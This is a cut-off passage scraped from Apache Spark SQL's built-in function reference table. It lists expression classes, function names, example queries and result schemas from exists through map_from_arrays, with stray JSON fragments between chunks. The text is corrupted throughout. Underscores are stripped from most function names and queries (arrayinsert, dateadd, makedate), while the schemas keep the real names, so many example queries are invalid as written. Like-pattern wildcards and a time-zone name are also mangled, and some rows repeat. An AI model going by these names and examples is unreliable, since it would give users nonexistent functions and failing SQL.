exists(array(1, 2, 3), x -> x % 2 == 0) | struct<exists(array(1, 2, 3), lambdafunction(((namedlambdavariable() % 2) = 0), namedlambdavariable())):boolean> | | org.apache.spark.sql.catalyst.expressions.ArrayFilter | filter | SELECT filter(array(1, 2, 3), x -> x % 2 == 1) | struct<filter(array(1, 2, 3), lambdafunction(((namedlambdavariable() % 2) = 1), namedlambdavariable())):array<int>> | | org.apache.spark.sql.catalyst.expressions.ArrayForAll | forall | SELECT forall(array(1, 2, 3), x -> x % 2 == 0) | struct<forall(array(1, 2, 3), lambdafunction(((namedlambdavariable() % 2) = 0), namedlambdavariable())):boolean> | | org.apache.spark.sql.catalyst.expressions.ArrayInsert | arrayinsert | SELECT arrayinsert(array(1, 2, 3, 4), 5, 5) | struct<array_insert(array(1, 2, 3, 4), 5, 5):array<int>> | | org.apache.spark.sql.catalyst.expressions.ArrayIntersect | arrayintersect | SELECT arrayintersect(array(1, 2, 3), array(1, 3, 5)) | struct<array_intersect(array(1, 2, 3), array(1, 3, 5)):array<int>> | | org.apache.spark.sql.catalyst.expressions.ArrayJoin | arrayjoin | SELECT arrayjoin(array('hello', 'world'), ' ') | struct<array_join(array(hello, world), ):string> | | org.apache.spark.sql.catalyst.expressions.ArrayMax | arraymax | SELECT arraymax(array(1, 20, null, 3)) | struct<array_max(array(1, 20, NULL, 3)):int> | | org.apache.spark.sql.catalyst.expressions.ArrayMin | arraymin | SELECT arraymin(array(1, 20, null, 3)) | struct<array_min(array(1, 20, NULL, 3)):int> | | org.apache.spark.sql.catalyst.expressions.ArrayPosition | arrayposition | SELECT arrayposition(array(312, 773, 708, 708), 708) | struct<array_position(array(312, 773, 708, 708), 708):bigint> | | org.apache.spark.sql.catalyst.expressions.ArrayPrepend | arrayprepend | SELECT arrayprepend(array('b', 'd', 'c', 'a'), 'd') | struct<array_prepend(array(b, d, c, a), d):array<string>> | | org.apache.spark.sql.catalyst.expressions.ArrayRemove | arrayremove | SELECT arrayremove(array(1, 2, 3, null, 3), 3) | struct<array_remove(array(1, 2, 3, NULL, 3), 3):array<int>> | | org.apache.spark.sql.catalyst.expressions.ArrayRepeat | arrayrepeat | SELECT arrayrepeat('123', 2) | struct<array_repeat(123, 2):array<string>> | | org.apache.spark.sql.catalyst.expressions.ArraySize | arraysize | SELECT arraysize(array('b', 'd', 'c', 'a')) | struct<array_size(array(b, d, c, a)):int> | |" }, { "data": "| arraysort | SELECT arraysort(array(5, 6, 1), (left, right) -> case when left < right then -1 when left > right then 1 else 0 end) | struct<array_sort(array(5, 6, 1), lambdafunction(CASE WHEN (namedlambdavariable() < namedlambdavariable()) THEN -1 WHEN (namedlambdavariable() > namedlambdavariable()) THEN 1 ELSE 0 END, namedlambdavariable(), namedlambdavariable())):array<int>> | | org.apache.spark.sql.catalyst.expressions.ArrayTransform | transform | SELECT transform(array(1, 2, 3), x -> x + 1) | struct<transform(array(1, 2, 3), lambdafunction((namedlambdavariable() + 1), namedlambdavariable())):array<int>> | | org.apache.spark.sql.catalyst.expressions.ArrayUnion | arrayunion | SELECT arrayunion(array(1, 2, 3), array(1, 3, 5)) | struct<array_union(array(1, 2, 3), array(1, 3, 5)):array<int>> | | org.apache.spark.sql.catalyst.expressions.ArraysOverlap | arraysoverlap | SELECT arraysoverlap(array(1, 2, 3), array(3, 4, 5)) | struct<arrays_overlap(array(1, 2, 3), array(3, 4, 5)):boolean> | | org.apache.spark.sql.catalyst.expressions.ArraysZip | arrayszip | SELECT arrayszip(array(1, 2, 3), array(2, 3, 4)) | struct<arrays_zip(array(1, 2, 3), array(2, 3, 4)):array<struct<0:int,1:int>>> | | org.apache.spark.sql.catalyst.expressions.Ascii | ascii | SELECT ascii('222') | struct<ascii(222):int> | | org.apache.spark.sql.catalyst.expressions.Asin | asin | SELECT asin(0) | struct<ASIN(0):double> | | org.apache.spark.sql.catalyst.expressions.Asinh | asinh | SELECT asinh(0) | struct<ASINH(0):double> | | org.apache.spark.sql.catalyst.expressions.AssertTrue | asserttrue | SELECT asserttrue(0 < 1) | struct<assert_true((0 < 1), '(0 < 1)' is not true!):void> | | org.apache.spark.sql.catalyst.expressions.Atan | atan | SELECT atan(0) | struct<ATAN(0):double> | | org.apache.spark.sql.catalyst.expressions.Atan2 | atan2 | SELECT atan2(0, 0) | struct<ATAN2(0, 0):double> | | org.apache.spark.sql.catalyst.expressions.Atanh | atanh | SELECT atanh(0) | struct<ATANH(0):double> | | org.apache.spark.sql.catalyst.expressions.BRound | bround | SELECT bround(2.5, 0) | struct<bround(2.5, 0):decimal(2,0)> | | org.apache.spark.sql.catalyst.expressions.Base64 | base64 | SELECT base64('Spark SQL') | struct<base64(Spark SQL):string> | | org.apache.spark.sql.catalyst.expressions.Between | between | SELECT 0.5 between 0.1 AND 1.0 | struct<between(0.5, 0.1, 1.0):boolean> | | org.apache.spark.sql.catalyst.expressions.Bin | bin | SELECT bin(13) | struct<bin(13):string> | | org.apache.spark.sql.catalyst.expressions.BitLength | bitlength | SELECT bitlength('Spark SQL') | struct<bit_length(Spark SQL):int> | | org.apache.spark.sql.catalyst.expressions.BitmapBitPosition | bitmapbitposition | SELECT bitmapbitposition(1) | struct<bitmapbitposition(1):bigint> | | org.apache.spark.sql.catalyst.expressions.BitmapBucketNumber | bitmapbucketnumber | SELECT bitmapbucketnumber(123) | struct<bitmapbucketnumber(123):bigint> | | org.apache.spark.sql.catalyst.expressions.BitmapConstructAgg | bitmapconstructagg | SELECT substring(hex(bitmapconstructagg(bitmapbitposition(col))), 0, 6) FROM VALUES (1), (2), (3) AS tab(col) | struct<substring(hex(bitmapconstructagg(bitmapbitposition(col))), 0, 6):string> | | org.apache.spark.sql.catalyst.expressions.BitmapCount | bitmapcount | SELECT bitmapcount(X '1010') | struct<bitmap_count(X'1010'):bigint> | | org.apache.spark.sql.catalyst.expressions.BitmapOrAgg | bitmaporagg | SELECT substring(hex(bitmaporagg(col)), 0, 6) FROM VALUES (X '10'), (X '20'), (X '40') AS tab(col) | struct<substring(hex(bitmaporagg(col)), 0, 6):string> | | org.apache.spark.sql.catalyst.expressions.BitwiseAnd | & | SELECT 3 & 5 | struct<(3 & 5):int> | | org.apache.spark.sql.catalyst.expressions.BitwiseCount | bitcount | SELECT bitcount(0) | struct<bit_count(0):int> | | org.apache.spark.sql.catalyst.expressions.BitwiseGet | bitget | SELECT bitget(11, 0) | struct<bit_get(11, 0):tinyint> | | org.apache.spark.sql.catalyst.expressions.BitwiseGet | getbit | SELECT getbit(11, 0) | struct<getbit(11, 0):tinyint> | | org.apache.spark.sql.catalyst.expressions.BitwiseNot | ~ | SELECT ~ 0 | struct<~0:int> | | org.apache.spark.sql.catalyst.expressions.BitwiseOr | &#124; | SELECT 3 &#124; 5 | struct<(3 &#124; 5):int> | | org.apache.spark.sql.catalyst.expressions.BitwiseXor | ^ | SELECT 3 ^ 5 | struct<(3 ^ 5):int> | | org.apache.spark.sql.catalyst.expressions.CallMethodViaReflection | javamethod | SELECT javamethod('java.util.UUID', 'randomUUID') | struct<java_method(java.util.UUID, randomUUID):string> | | org.apache.spark.sql.catalyst.expressions.CallMethodViaReflection | reflect | SELECT reflect('java.util.UUID', 'randomUUID') | struct<reflect(java.util.UUID, randomUUID):string> | | org.apache.spark.sql.catalyst.expressions.CaseWhen | when | SELECT CASE WHEN 1 > 0 THEN 1 WHEN 2 > 0 THEN 2.0 ELSE 1.2 END | struct<CASE WHEN (1 > 0) THEN 1 WHEN (2 > 0) THEN 2.0 ELSE 1.2 END:decimal(11,1)> | | org.apache.spark.sql.catalyst.expressions.Cast | bigint | N/A | N/A | | org.apache.spark.sql.catalyst.expressions.Cast | binary | N/A | N/A | | org.apache.spark.sql.catalyst.expressions.Cast | boolean | N/A | N/A | | org.apache.spark.sql.catalyst.expressions.Cast | cast | SELECT cast('10' as int) | struct<CAST(10 AS INT):int> | | org.apache.spark.sql.catalyst.expressions.Cast | date | N/A | N/A | | org.apache.spark.sql.catalyst.expressions.Cast | decimal | N/A | N/A | | org.apache.spark.sql.catalyst.expressions.Cast | double | N/A | N/A | | org.apache.spark.sql.catalyst.expressions.Cast | float | N/A | N/A | | org.apache.spark.sql.catalyst.expressions.Cast | int | N/A | N/A | | org.apache.spark.sql.catalyst.expressions.Cast | smallint | N/A | N/A | | org.apache.spark.sql.catalyst.expressions.Cast | string | N/A | N/A | | org.apache.spark.sql.catalyst.expressions.Cast | timestamp | N/A | N/A | |" }, { "data": "| tinyint | N/A | N/A | | org.apache.spark.sql.catalyst.expressions.Cbrt | cbrt | SELECT cbrt(27.0) | struct<CBRT(27.0):double> | | org.apache.spark.sql.catalyst.expressions.CeilExpressionBuilder | ceil | SELECT ceil(-0.1) | struct<CEIL(-0.1):decimal(1,0)> | | org.apache.spark.sql.catalyst.expressions.CeilExpressionBuilder | ceiling | SELECT ceiling(-0.1) | struct<ceiling(-0.1):decimal(1,0)> | | org.apache.spark.sql.catalyst.expressions.Chr | char | SELECT char(65) | struct<char(65):string> | | org.apache.spark.sql.catalyst.expressions.Chr | chr | SELECT chr(65) | struct<chr(65):string> | | org.apache.spark.sql.catalyst.expressions.Coalesce | coalesce | SELECT coalesce(NULL, 1, NULL) | struct<coalesce(NULL, 1, NULL):int> | | org.apache.spark.sql.catalyst.expressions.CollateExpressionBuilder | collate | SELECT COLLATION('Spark SQL' collate UTF8BINARYLCASE) | struct<collation(collate(Spark SQL)):string> | | org.apache.spark.sql.catalyst.expressions.Collation | collation | SELECT collation('Spark SQL') | struct<collation(Spark SQL):string> | | org.apache.spark.sql.catalyst.expressions.Concat | concat | SELECT concat('Spark', 'SQL') | struct<concat(Spark, SQL):string> | | org.apache.spark.sql.catalyst.expressions.ConcatWs | concatws | SELECT concatws(' ', 'Spark', 'SQL') | struct<concat_ws( , Spark, SQL):string> | | org.apache.spark.sql.catalyst.expressions.ContainsExpressionBuilder | contains | SELECT contains('Spark SQL', 'Spark') | struct<contains(Spark SQL, Spark):boolean> | | org.apache.spark.sql.catalyst.expressions.Conv | conv | SELECT conv('100', 2, 10) | struct<conv(100, 2, 10):string> | | org.apache.spark.sql.catalyst.expressions.ConvertTimezone | converttimezone | SELECT converttimezone('Europe/Brussels', 'America/LosAngeles', timestampntz'2021-12-06 00:00:00') | struct<converttimezone(Europe/Brussels, America/LosAngeles, TIMESTAMPNTZ '2021-12-06 00:00:00'):timestampntz> | | org.apache.spark.sql.catalyst.expressions.Cos | cos | SELECT cos(0) | struct<COS(0):double> | | org.apache.spark.sql.catalyst.expressions.Cosh | cosh | SELECT cosh(0) | struct<COSH(0):double> | | org.apache.spark.sql.catalyst.expressions.Cot | cot | SELECT cot(1) | struct<COT(1):double> | | org.apache.spark.sql.catalyst.expressions.Crc32 | crc32 | SELECT crc32('Spark') | struct<crc32(Spark):bigint> | | org.apache.spark.sql.catalyst.expressions.CreateArray | array | SELECT array(1, 2, 3) | struct<array(1, 2, 3):array<int>> | | org.apache.spark.sql.catalyst.expressions.CreateMap | map | SELECT map(1.0, '2', 3.0, '4') | struct<map(1.0, 2, 3.0, 4):map<decimal(2,1),string>> | | org.apache.spark.sql.catalyst.expressions.CreateNamedStruct | namedstruct | SELECT namedstruct(\"a\", 1, \"b\", 2, \"c\", 3) | struct<named_struct(a, 1, b, 2, c, 3):struct<a:int,b:int,c:int>> | | org.apache.spark.sql.catalyst.expressions.CreateNamedStruct | struct | SELECT struct(1, 2, 3) | struct<struct(1, 2, 3):struct<col1:int,col2:int,col3:int>> | | org.apache.spark.sql.catalyst.expressions.Csc | csc | SELECT csc(1) | struct<CSC(1):double> | | org.apache.spark.sql.catalyst.expressions.CsvToStructs | fromcsv | SELECT fromcsv('1, 0.8', 'a INT, b DOUBLE') | struct<from_csv(1, 0.8):struct<a:int,b:double>> | | org.apache.spark.sql.catalyst.expressions.CumeDist | cumedist | SELECT a, b, cumedist() OVER (PARTITION BY a ORDER BY b) FROM VALUES ('A1', 2), ('A1', 1), ('A2', 3), ('A1', 1) tab(a, b) | struct<a:string,b:int,cume_dist() OVER (PARTITION BY a ORDER BY b ASC NULLS FIRST RANGE BETWEEN UNBOUNDED PRECEDING AND CURRENT ROW):double> | | org.apache.spark.sql.catalyst.expressions.CurDateExpressionBuilder | curdate | SELECT curdate() | struct<current_date():date> | | org.apache.spark.sql.catalyst.expressions.CurrentCatalog | currentcatalog | SELECT currentcatalog() | struct<current_catalog():string> | | org.apache.spark.sql.catalyst.expressions.CurrentDatabase | currentdatabase | SELECT currentdatabase() | struct<current_schema():string> | | org.apache.spark.sql.catalyst.expressions.CurrentDatabase | currentschema | SELECT currentschema() | struct<current_schema():string> | | org.apache.spark.sql.catalyst.expressions.CurrentDate | currentdate | SELECT currentdate() | struct<current_date():date> | | org.apache.spark.sql.catalyst.expressions.CurrentTimeZone | currenttimezone | SELECT currenttimezone() | struct<current_timezone():string> | | org.apache.spark.sql.catalyst.expressions.CurrentTimestamp | currenttimestamp | SELECT currenttimestamp() | struct<current_timestamp():timestamp> | | org.apache.spark.sql.catalyst.expressions.CurrentUser | currentuser | SELECT currentuser() | struct<current_user():string> | | org.apache.spark.sql.catalyst.expressions.CurrentUser | sessionuser | SELECT sessionuser() | struct<session_user():string> | | org.apache.spark.sql.catalyst.expressions.CurrentUser | user | SELECT user() | struct<user():string> | | org.apache.spark.sql.catalyst.expressions.DateAdd | dateadd | SELECT dateadd('2016-07-30', 1) | struct<date_add(2016-07-30, 1):date> | | org.apache.spark.sql.catalyst.expressions.DateAdd | dateadd | SELECT dateadd('2016-07-30', 1) | struct<date_add(2016-07-30, 1):date> | | org.apache.spark.sql.catalyst.expressions.DateDiff | datediff | SELECT datediff('2009-07-31', '2009-07-30') | struct<date_diff(2009-07-31, 2009-07-30):int> | | org.apache.spark.sql.catalyst.expressions.DateDiff | datediff | SELECT datediff('2009-07-31', '2009-07-30') | struct<datediff(2009-07-31, 2009-07-30):int> | | org.apache.spark.sql.catalyst.expressions.DateFormatClass | dateformat | SELECT dateformat('2016-04-08', 'y') | struct<date_format(2016-04-08, y):string> | | org.apache.spark.sql.catalyst.expressions.DateFromUnixDate | datefromunixdate | SELECT datefromunixdate(1) | struct<datefromunix_date(1):date> | | org.apache.spark.sql.catalyst.expressions.DatePartExpressionBuilder | datepart | SELECT datepart('YEAR', TIMESTAMP '2019-08-12 01:00:00.123456') | struct<date_part(YEAR, TIMESTAMP '2019-08-12 01:00:00.123456'):int> | | org.apache.spark.sql.catalyst.expressions.DatePartExpressionBuilder | datepart | SELECT datepart('YEAR', TIMESTAMP '2019-08-12 01:00:00.123456') | struct<datepart(YEAR FROM TIMESTAMP '2019-08-12 01:00:00.123456'):int> | | org.apache.spark.sql.catalyst.expressions.DateSub | datesub | SELECT datesub('2016-07-30', 1) | struct<date_sub(2016-07-30, 1):date> | | org.apache.spark.sql.catalyst.expressions.DayName | dayname | SELECT dayname(DATE('2008-02-20')) | struct<dayname(2008-02-20):string> | | org.apache.spark.sql.catalyst.expressions.DayOfMonth | day | SELECT day('2009-07-30') | struct<day(2009-07-30):int> | |" }, { "data": "| dayofmonth | SELECT dayofmonth('2009-07-30') | struct<dayofmonth(2009-07-30):int> | | org.apache.spark.sql.catalyst.expressions.DayOfWeek | dayofweek | SELECT dayofweek('2009-07-30') | struct<dayofweek(2009-07-30):int> | | org.apache.spark.sql.catalyst.expressions.DayOfYear | dayofyear | SELECT dayofyear('2016-04-09') | struct<dayofyear(2016-04-09):int> | | org.apache.spark.sql.catalyst.expressions.Decode | decode | SELECT decode(encode('abc', 'utf-8'), 'utf-8') | struct<decode(encode(abc, utf-8), utf-8):string> | | org.apache.spark.sql.catalyst.expressions.DenseRank | denserank | SELECT a, b, denserank(b) OVER (PARTITION BY a ORDER BY b) FROM VALUES ('A1', 2), ('A1', 1), ('A2', 3), ('A1', 1) tab(a, b) | struct<a:string,b:int,DENSE_RANK() OVER (PARTITION BY a ORDER BY b ASC NULLS FIRST ROWS BETWEEN UNBOUNDED PRECEDING AND CURRENT ROW):int> | | org.apache.spark.sql.catalyst.expressions.Divide | / | SELECT 3 / 2 | struct<(3 / 2):double> | | org.apache.spark.sql.catalyst.expressions.ElementAt | elementat | SELECT elementat(array(1, 2, 3), 2) | struct<element_at(array(1, 2, 3), 2):int> | | org.apache.spark.sql.catalyst.expressions.Elt | elt | SELECT elt(1, 'scala', 'java') | struct<elt(1, scala, java):string> | | org.apache.spark.sql.catalyst.expressions.Encode | encode | SELECT encode('abc', 'utf-8') | struct<encode(abc, utf-8):binary> | | org.apache.spark.sql.catalyst.expressions.EndsWithExpressionBuilder | endswith | SELECT endswith('Spark SQL', 'SQL') | struct<endswith(Spark SQL, SQL):boolean> | | org.apache.spark.sql.catalyst.expressions.EqualNull | equalnull | SELECT equalnull(3, 3) | struct<equal_null(3, 3):boolean> | | org.apache.spark.sql.catalyst.expressions.EqualNullSafe | <=> | SELECT 2 <=> 2 | struct<(2 <=> 2):boolean> | | org.apache.spark.sql.catalyst.expressions.EqualTo | = | SELECT 2 = 2 | struct<(2 = 2):boolean> | | org.apache.spark.sql.catalyst.expressions.EqualTo | == | SELECT 2 == 2 | struct<(2 = 2):boolean> | | org.apache.spark.sql.catalyst.expressions.EulerNumber | e | SELECT e() | struct<E():double> | | org.apache.spark.sql.catalyst.expressions.Exp | exp | SELECT exp(0) | struct<EXP(0):double> | | org.apache.spark.sql.catalyst.expressions.ExplodeExpressionBuilder | explode | SELECT explode(array(10, 20)) | struct<col:int> | | org.apache.spark.sql.catalyst.expressions.ExplodeExpressionBuilder | explodeouter | SELECT explodeouter(array(10, 20)) | struct<col:int> | | org.apache.spark.sql.catalyst.expressions.Expm1 | expm1 | SELECT expm1(0) | struct<EXPM1(0):double> | | org.apache.spark.sql.catalyst.expressions.Extract | extract | SELECT extract(YEAR FROM TIMESTAMP '2019-08-12 01:00:00.123456') | struct<extract(YEAR FROM TIMESTAMP '2019-08-12 01:00:00.123456'):int> | | org.apache.spark.sql.catalyst.expressions.Factorial | factorial | SELECT factorial(5) | struct<factorial(5):bigint> | | org.apache.spark.sql.catalyst.expressions.FindInSet | findinset | SELECT findinset('ab','abc,b,ab,c,def') | struct<findinset(ab, abc,b,ab,c,def):int> | | org.apache.spark.sql.catalyst.expressions.Flatten | flatten | SELECT flatten(array(array(1, 2), array(3, 4))) | struct<flatten(array(array(1, 2), array(3, 4))):array<int>> | | org.apache.spark.sql.catalyst.expressions.FloorExpressionBuilder | floor | SELECT floor(-0.1) | struct<FLOOR(-0.1):decimal(1,0)> | | org.apache.spark.sql.catalyst.expressions.FormatNumber | formatnumber | SELECT formatnumber(12332.123456, 4) | struct<format_number(12332.123456, 4):string> | | org.apache.spark.sql.catalyst.expressions.FormatString | formatstring | SELECT formatstring(\"Hello World %d %s\", 100, \"days\") | struct<format_string(Hello World %d %s, 100, days):string> | | org.apache.spark.sql.catalyst.expressions.FormatString | printf | SELECT printf(\"Hello World %d %s\", 100, \"days\") | struct<printf(Hello World %d %s, 100, days):string> | | org.apache.spark.sql.catalyst.expressions.FromUTCTimestamp | fromutctimestamp | SELECT fromutctimestamp('2016-08-31', 'Asia/Seoul') | struct<fromutctimestamp(2016-08-31, Asia/Seoul):timestamp> | | org.apache.spark.sql.catalyst.expressions.FromUnixTime | fromunixtime | SELECT fromunixtime(0, 'yyyy-MM-dd HH:mm:ss') | struct<from_unixtime(0, yyyy-MM-dd HH:mm:ss):string> | | org.apache.spark.sql.catalyst.expressions.Get | get | SELECT get(array(1, 2, 3), 0) | struct<get(array(1, 2, 3), 0):int> | | org.apache.spark.sql.catalyst.expressions.GetJsonObject | getjsonobject | SELECT getjsonobject('{\"a\":\"b\"}', '$.a') | struct<getjsonobject({\"a\":\"b\"}, $.a):string> | | org.apache.spark.sql.catalyst.expressions.GreaterThan | > | SELECT 2 > 1 | struct<(2 > 1):boolean> | | org.apache.spark.sql.catalyst.expressions.GreaterThanOrEqual | >= | SELECT 2 >= 1 | struct<(2 >= 1):boolean> | | org.apache.spark.sql.catalyst.expressions.Greatest | greatest | SELECT greatest(10, 9, 2, 4, 3) | struct<greatest(10, 9, 2, 4, 3):int> | | org.apache.spark.sql.catalyst.expressions.Grouping | grouping | SELECT name, grouping(name), sum(age) FROM VALUES (2, 'Alice'), (5, 'Bob') people(age, name) GROUP BY cube(name) | struct<name:string,grouping(name):tinyint,sum(age):bigint> | | org.apache.spark.sql.catalyst.expressions.GroupingID | groupingid | SELECT name, groupingid(), sum(age), avg(height) FROM VALUES (2, 'Alice', 165), (5, 'Bob', 180) people(age, name, height) GROUP BY cube(name, height) | struct<name:string,grouping_id():bigint,sum(age):bigint,avg(height):double> | | org.apache.spark.sql.catalyst.expressions.Hex | hex | SELECT hex(17) | struct<hex(17):string> | | org.apache.spark.sql.catalyst.expressions.HllSketchEstimate | hllsketchestimate | SELECT hllsketchestimate(hllsketchagg(col)) FROM VALUES (1), (1), (2), (2), (3) tab(col) | struct<hllsketchestimate(hllsketchagg(col, 12)):bigint> | |" }, { "data": "| hllunion | SELECT hllsketchestimate(hllunion(hllsketchagg(col1), hllsketchagg(col2))) FROM VALUES (1, 4), (1, 4), (2, 5), (2, 5), (3, 6) tab(col1, col2) | struct<hllsketchestimate(hllunion(hllsketchagg(col1, 12), hllsketch_agg(col2, 12), false)):bigint> | | org.apache.spark.sql.catalyst.expressions.Hour | hour | SELECT hour('2009-07-30 12:58:59') | struct<hour(2009-07-30 12:58:59):int> | | org.apache.spark.sql.catalyst.expressions.Hypot | hypot | SELECT hypot(3, 4) | struct<HYPOT(3, 4):double> | | org.apache.spark.sql.catalyst.expressions.ILike | ilike | SELECT ilike('Spark', 'Park') | struct<ilike(Spark, Park):boolean> | | org.apache.spark.sql.catalyst.expressions.If | if | SELECT if(1 < 2, 'a', 'b') | struct<(IF((1 < 2), a, b)):string> | | org.apache.spark.sql.catalyst.expressions.In | in | SELECT 1 in(1, 2, 3) | struct<(1 IN (1, 2, 3)):boolean> | | org.apache.spark.sql.catalyst.expressions.InitCap | initcap | SELECT initcap('sPark sql') | struct<initcap(sPark sql):string> | | org.apache.spark.sql.catalyst.expressions.Inline | inline | SELECT inline(array(struct(1, 'a'), struct(2, 'b'))) | struct<col1:int,col2:string> | | org.apache.spark.sql.catalyst.expressions.Inline | inlineouter | SELECT inlineouter(array(struct(1, 'a'), struct(2, 'b'))) | struct<col1:int,col2:string> | | org.apache.spark.sql.catalyst.expressions.InputFileBlockLength | inputfileblocklength | SELECT inputfileblocklength() | struct<inputfileblock_length():bigint> | | org.apache.spark.sql.catalyst.expressions.InputFileBlockStart | inputfileblockstart | SELECT inputfileblockstart() | struct<inputfileblock_start():bigint> | | org.apache.spark.sql.catalyst.expressions.InputFileName | inputfilename | SELECT inputfilename() | struct<inputfilename():string> | | org.apache.spark.sql.catalyst.expressions.IntegralDivide | div | SELECT 3 div 2 | struct<(3 div 2):bigint> | | org.apache.spark.sql.catalyst.expressions.IsNaN | isnan | SELECT isnan(cast('NaN' as double)) | struct<isnan(CAST(NaN AS DOUBLE)):boolean> | | org.apache.spark.sql.catalyst.expressions.IsNotNull | isnotnull | SELECT isnotnull(1) | struct<(1 IS NOT NULL):boolean> | | org.apache.spark.sql.catalyst.expressions.IsNull | isnull | SELECT isnull(1) | struct<(1 IS NULL):boolean> | | org.apache.spark.sql.catalyst.expressions.JsonObjectKeys | jsonobjectkeys | SELECT jsonobjectkeys('{}') | struct<jsonobjectkeys({}):array<string>> | | org.apache.spark.sql.catalyst.expressions.JsonToStructs | fromjson | SELECT fromjson('{\"a\":1, \"b\":0.8}', 'a INT, b DOUBLE') | struct<from_json({\"a\":1, \"b\":0.8}):struct<a:int,b:double>> | | org.apache.spark.sql.catalyst.expressions.JsonTuple | jsontuple | SELECT jsontuple('{\"a\":1, \"b\":2}', 'a', 'b') | struct<c0:string,c1:string> | | org.apache.spark.sql.catalyst.expressions.LPadExpressionBuilder | lpad | SELECT lpad('hi', 5, '??') | struct<lpad(hi, 5, ??):string> | | org.apache.spark.sql.catalyst.expressions.Lag | lag | SELECT a, b, lag(b) OVER (PARTITION BY a ORDER BY b) FROM VALUES ('A1', 2), ('A1', 1), ('A2', 3), ('A1', 1) tab(a, b) | struct<a:string,b:int,lag(b, 1, NULL) OVER (PARTITION BY a ORDER BY b ASC NULLS FIRST ROWS BETWEEN -1 FOLLOWING AND -1 FOLLOWING):int> | | org.apache.spark.sql.catalyst.expressions.LastDay | lastday | SELECT lastday('2009-01-12') | struct<last_day(2009-01-12):date> | | org.apache.spark.sql.catalyst.expressions.Lead | lead | SELECT a, b, lead(b) OVER (PARTITION BY a ORDER BY b) FROM VALUES ('A1', 2), ('A1', 1), ('A2', 3), ('A1', 1) tab(a, b) | struct<a:string,b:int,lead(b, 1, NULL) OVER (PARTITION BY a ORDER BY b ASC NULLS FIRST ROWS BETWEEN 1 FOLLOWING AND 1 FOLLOWING):int> | | org.apache.spark.sql.catalyst.expressions.Least | least | SELECT least(10, 9, 2, 4, 3) | struct<least(10, 9, 2, 4, 3):int> | | org.apache.spark.sql.catalyst.expressions.Left | left | SELECT left('Spark SQL', 3) | struct<left(Spark SQL, 3):string> | | org.apache.spark.sql.catalyst.expressions.Length | charlength | SELECT charlength('Spark SQL ') | struct<char_length(Spark SQL ):int> | | org.apache.spark.sql.catalyst.expressions.Length | characterlength | SELECT characterlength('Spark SQL ') | struct<character_length(Spark SQL ):int> | | org.apache.spark.sql.catalyst.expressions.Length | len | SELECT len('Spark SQL ') | struct<len(Spark SQL ):int> | | org.apache.spark.sql.catalyst.expressions.Length | length | SELECT length('Spark SQL ') | struct<length(Spark SQL ):int> | | org.apache.spark.sql.catalyst.expressions.LengthOfJsonArray | jsonarraylength | SELECT jsonarraylength('[1,2,3,4]') | struct<jsonarraylength([1,2,3,4]):int> | | org.apache.spark.sql.catalyst.expressions.LessThan | < | SELECT 1 < 2 | struct<(1 < 2):boolean> | | org.apache.spark.sql.catalyst.expressions.LessThanOrEqual | <= | SELECT 2 <= 2 | struct<(2 <= 2):boolean> | | org.apache.spark.sql.catalyst.expressions.Levenshtein | levenshtein | SELECT levenshtein('kitten', 'sitting') | struct<levenshtein(kitten, sitting):int> | | org.apache.spark.sql.catalyst.expressions.Like | like | SELECT like('Spark', 'park') | struct<Spark LIKE park:boolean> | | org.apache.spark.sql.catalyst.expressions.LocalTimestamp | localtimestamp | SELECT localtimestamp() | struct<localtimestamp():timestamp_ntz> | | org.apache.spark.sql.catalyst.expressions.Log | ln | SELECT ln(1) | struct<ln(1):double> | | org.apache.spark.sql.catalyst.expressions.Log10 | log10 | SELECT log10(10) | struct<LOG10(10):double> | | org.apache.spark.sql.catalyst.expressions.Log1p | log1p | SELECT log1p(0) | struct<LOG1P(0):double> | | org.apache.spark.sql.catalyst.expressions.Log2 | log2 | SELECT log2(2) | struct<LOG2(2):double> | |" }, { "data": "| log | SELECT log(10, 100) | struct<LOG(10, 100):double> | | org.apache.spark.sql.catalyst.expressions.Lower | lcase | SELECT lcase('SparkSql') | struct<lcase(SparkSql):string> | | org.apache.spark.sql.catalyst.expressions.Lower | lower | SELECT lower('SparkSql') | struct<lower(SparkSql):string> | | org.apache.spark.sql.catalyst.expressions.Luhncheck | luhncheck | SELECT luhncheck('8112189876') | struct<luhn_check(8112189876):boolean> | | org.apache.spark.sql.catalyst.expressions.MakeDTInterval | makedtinterval | SELECT makedtinterval(1, 12, 30, 01.001001) | struct<makedtinterval(1, 12, 30, 1.001001):interval day to second> | | org.apache.spark.sql.catalyst.expressions.MakeDate | makedate | SELECT makedate(2013, 7, 15) | struct<make_date(2013, 7, 15):date> | | org.apache.spark.sql.catalyst.expressions.MakeInterval | makeinterval | SELECT makeinterval(100, 11, 1, 1, 12, 30, 01.001001) | struct<make_interval(100, 11, 1, 1, 12, 30, 1.001001):interval> | | org.apache.spark.sql.catalyst.expressions.MakeTimestamp | maketimestamp | SELECT maketimestamp(2014, 12, 28, 6, 30, 45.887) | struct<make_timestamp(2014, 12, 28, 6, 30, 45.887):timestamp> | | org.apache.spark.sql.catalyst.expressions.MakeTimestampLTZExpressionBuilder | maketimestampltz | SELECT maketimestampltz(2014, 12, 28, 6, 30, 45.887) | struct<maketimestampltz(2014, 12, 28, 6, 30, 45.887):timestamp> | | org.apache.spark.sql.catalyst.expressions.MakeTimestampNTZExpressionBuilder | maketimestampntz | SELECT maketimestampntz(2014, 12, 28, 6, 30, 45.887) | struct<maketimestampntz(2014, 12, 28, 6, 30, 45.887):timestamp_ntz> | | org.apache.spark.sql.catalyst.expressions.MakeYMInterval | makeyminterval | SELECT makeyminterval(1, 2) | struct<makeyminterval(1, 2):interval year to month> | | org.apache.spark.sql.catalyst.expressions.MapConcat | mapconcat | SELECT mapconcat(map(1, 'a', 2, 'b'), map(3, 'c')) | struct<map_concat(map(1, a, 2, b), map(3, c)):map<int,string>> | | org.apache.spark.sql.catalyst.expressions.MapContainsKey | mapcontainskey | SELECT mapcontainskey(map(1, 'a', 2, 'b'), 1) | struct<mapcontainskey(map(1, a, 2, b), 1):boolean> | | org.apache.spark.sql.catalyst.expressions.MapEntries | mapentries | SELECT mapentries(map(1, 'a', 2, 'b')) | struct<map_entries(map(1, a, 2, b)):array<struct<key:int,value:string>>> | | org.apache.spark.sql.catalyst.expressions.MapFilter | mapfilter | SELECT mapfilter(map(1, 0, 2, 2, 3, -1), (k, v) -> k > v) | struct<map_filter(map(1, 0, 2, 2, 3, -1), lambdafunction((namedlambdavariable() > namedlambdavariable()), namedlambdavariable(), namedlambdavariable())):map<int,int>> | | org.apache.spark.sql.catalyst.expressions.MapFromArrays | mapfromarrays | SELECT mapfromarrays(array(1.0, 3.0), array('2', '4')) | struct<mapfromarrays(array(1.0, 3.0), array(2, 